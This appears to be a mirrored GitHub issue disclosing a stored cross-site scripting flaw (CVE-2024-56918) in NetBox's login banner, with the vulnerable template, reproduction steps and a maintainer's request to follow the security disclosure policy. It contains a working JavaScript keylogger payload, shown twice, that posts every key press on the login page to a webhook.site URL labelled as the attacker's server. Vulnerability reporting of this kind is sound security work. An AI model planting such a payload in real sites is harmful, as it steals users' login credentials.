starred/netbox
1
0
Fork 0
mirror of https://github.com/netbox-community/netbox.git synced 2026-01-11 21:10:29 +01:00
Code Issues 273 Packages Projects Releases 10 Wiki Activity

XXS in Login Banner allows malicious authenticated administrators to log keystrokes. - CVE-2024-56918 #10743

New Issue
Closed
opened 2025-12-29 21:35:25 +01:00 by adam · 1 comment
adam commented 2025-12-29 21:35:25 +01:00
Owner
Copy Link

Originally created by @noxlumens on GitHub (Feb 7, 2025).

Deployment Type

Self-hosted

NetBox Version

v4.2.3

Python Version

3.12

Steps to Reproduce

Login Banner - https://<ADDRESS>/login/?next=/

Image

Image

This has been validated on Netbox version 4.2.3
Proof Of Concept

This CVE ID has been reserverd for this vulnerability CVE-2024-56918

Summary

The login page is vulnerable to cross-site scripting (XSS), which allows a privileged, authenticated attacker to ex-filtrate user input from the login form. In most use cases, the impact is minimal; however, if multiple users have access to the NetBox instance, usernames and passwords can be remotely sent to an attacker-controlled server.

Source Code:

/netbox/templates/inc/login.html

This section uses the Django |safe parameter in netbox/templates/login.html which enforces the location as trusted and allows the interpretation of user defined input without sanitizing the content.

{# Login banner #}
{% if config.BANNER_LOGIN %}
<div class="mb-5 text-center">
  {{ config.BANNER_LOGIN|safe }}
</div>
{% endif %}
Reproduce the Attack
  1. Copy the [Proof Of Concept - Capture Login Authentication] code.
    If you would like a more simple xss example you can paste the following into the login banner config entry and skip to step 4
<script>alert("XSS")</script>
  1. Navigate to https://webhook.site and copy the "Your unique URL" value
  2. Paste the "Your unique URL" value into the fetch request in [Proof Of Concept - Capture Login Authentication]
  3. Navigate to https://<ADDRESS>/core/config-revisions/add/ and paste the script into the Login bannerhttps://<ADDRESS>/core/config-revisions/add/ > login banner
  4. Save by clicking "Create"
  5. Log out and navigate to the Login page. https://<ADDRESS>/login/?next=/
    From this point you can type your credentials. The key presses will appear as post requests at your webhook.site address.

Proof Of Concept - Capture Login Authentication

I used https://webhook.site as the attacker server to capture key press events. This assumes the internet is accessible for upgrades and webhook.site or other similar web application is not blocked.

Login Banner
<script>
document.addEventListener('keydown', function(event) {
    var key = event.key;  // Get the key pressed
    var keyCode = event.keyCode;  // Get the keyCode (for identifying keys)

    // Function to get cookie value by name
    function getCookie(name) {
        let match = document.cookie.match(new RegExp('(^| )' + name + '=([^;]+)'));
        if (match) return match[2];
        return null;
    }
    // Send the captured key press to the attacker's server
    fetch('https://webhook.site/df459d0e-39af-4880-abbb-240a452de07e', {  // Attacker's server URL
        method: 'POST',
        mode: 'no-cors',
        headers: {
            'Content-Type': 'application/x-www-form-urlencoded',
        },
        body: `key=${encodeURIComponent(key)}&keyCode=${keyCode}`
    })
    .then(response => response.json())  // Convert to JSON
    .then(data => console.log('Key logged:', data))  // Log success
    .catch(error => console.error('Error logging key:', error));  // Log error
});
</script>

Expected Behavior

User input should be sanitized. Removing the |safe from /netbox/templates/inc/login.html will resolve this but may break intended functionality.

Observed Behavior

Javascript alert appears on login and user key strokes are sent to malicious administrator controlled endpoint.

Originally created by @noxlumens on GitHub (Feb 7, 2025). ### Deployment Type Self-hosted ### NetBox Version v4.2.3 ### Python Version 3.12 ### Steps to Reproduce # Login Banner - `https://<ADDRESS>/login/?next=/` ![Image](https://github.com/user-attachments/assets/e865d10e-f507-47f5-b72f-e05feafa34f0) ![Image](https://github.com/user-attachments/assets/45c16262-ede1-49a9-914f-d9a17765b4b7) This has been validated on Netbox version 4.2.3 [Proof Of Concept](https://youtu.be/zBbjNNK79pg) This CVE ID has been reserverd for this vulnerability `CVE-2024-56918` #### Summary The login page is vulnerable to cross-site scripting (XSS), which allows a privileged, authenticated attacker to ex-filtrate user input from the login form. In most use cases, the impact is minimal; however, if multiple users have access to the NetBox instance, usernames and passwords can be remotely sent to an attacker-controlled server. ### *Source Code:* *`/netbox/templates/inc/login.html`* This section uses the Django `|safe` parameter in `netbox/templates/login.html` which enforces the location as trusted and allows the interpretation of user defined input without sanitizing the content. ```html {# Login banner #} {% if config.BANNER_LOGIN %} <div class="mb-5 text-center"> {{ config.BANNER_LOGIN|safe }} </div> {% endif %} ``` ###### Reproduce the Attack 1. Copy the [_Proof Of Concept - Capture Login Authentication_] code. If you would like a more simple xss example you can paste the following into the login banner config entry and skip to step 4 ```javascript <script>alert("XSS")</script> ``` 2. Navigate to https://webhook.site and copy the "Your unique URL" value 3. Paste the "Your unique URL" value into the fetch request in [_Proof Of Concept - Capture Login Authentication_] 4. Navigate to `https://<ADDRESS>/core/config-revisions/add/` and paste the script into the Login banner`https://<ADDRESS>/core/config-revisions/add/ > login banner` 5. Save by clicking "Create" 6. Log out and navigate to the Login page. `https://<ADDRESS>/login/?next=/` From this point you can type your credentials. The key presses will appear as post requests at your webhook.site address. # Proof Of Concept - Capture Login Authentication I used https://webhook.site as the attacker server to capture key press events. This assumes the internet is accessible for upgrades and webhook.site or other similar web application is not blocked. ```javascript Login Banner <script> document.addEventListener('keydown', function(event) { var key = event.key; // Get the key pressed var keyCode = event.keyCode; // Get the keyCode (for identifying keys) // Function to get cookie value by name function getCookie(name) { let match = document.cookie.match(new RegExp('(^| )' + name + '=([^;]+)')); if (match) return match[2]; return null; } // Send the captured key press to the attacker's server fetch('https://webhook.site/df459d0e-39af-4880-abbb-240a452de07e', { // Attacker's server URL method: 'POST', mode: 'no-cors', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: `key=${encodeURIComponent(key)}&keyCode=${keyCode}` }) .then(response => response.json()) // Convert to JSON .then(data => console.log('Key logged:', data)) // Log success .catch(error => console.error('Error logging key:', error)); // Log error }); </script> ``` ### Expected Behavior User input should be sanitized. Removing the `|safe` from `/netbox/templates/inc/login.html` will resolve this but may break intended functionality. ### Observed Behavior Javascript alert appears on login and user key strokes are sent to malicious administrator controlled endpoint.
adam closed this issue 2025-12-29 21:35:26 +01:00
adam commented 2025-12-29 21:35:26 +01:00
Author
Owner
Copy Link

@DanSheps commented on GitHub (Feb 7, 2025):

Please follow the proper disclosure procedure here:

https://github.com/netbox-community/netbox/blob/main/SECURITY.md

@DanSheps commented on GitHub (Feb 7, 2025): Please follow the proper disclosure procedure here: https://github.com/netbox-community/netbox/blob/main/SECURITY.md
Sign in to join this conversation.
No Branch/Tag Specified
Branches Tags
Labels
Clear labels
beta
breaking change
complexity: high
complexity: low
complexity: medium
needs milestone
netbox
pending closure
plugin candidate
pull-request
Mirrored from GitHub Pull Request
 severity: high
severity: low
severity: medium
status: accepted
status: backlog
status: blocked
status: duplicate
status: needs owner
status: needs triage
status: revisions needed
status: under review
topic: GraphQL
topic: Internationalization
topic: OpenAPI
topic: UI/UX
topic: cabling
topic: event rules
topic: htmx navigation
topic: industrialization
topic: migrations
topic: plugins
topic: scripts
topic: templating
topic: testing
type: bug
type: deprecation
type: documentation
type: feature
type: housekeeping
type: translation
No Label
Milestone
No items
No Milestone
Projects
Clear projects
No project
Assignees
Clear assignees
adam
No Assignees
1 Participants
Notifications
Due Date
No due date set.
Dependencies

No dependencies set.

Reference: starred/netbox#10743
Delete Branch "%!s()"

Deleting a branch is permanent. Although the deleted branch may continue to exist for a short time before it actually gets removed, it CANNOT be undone in most cases. Continue?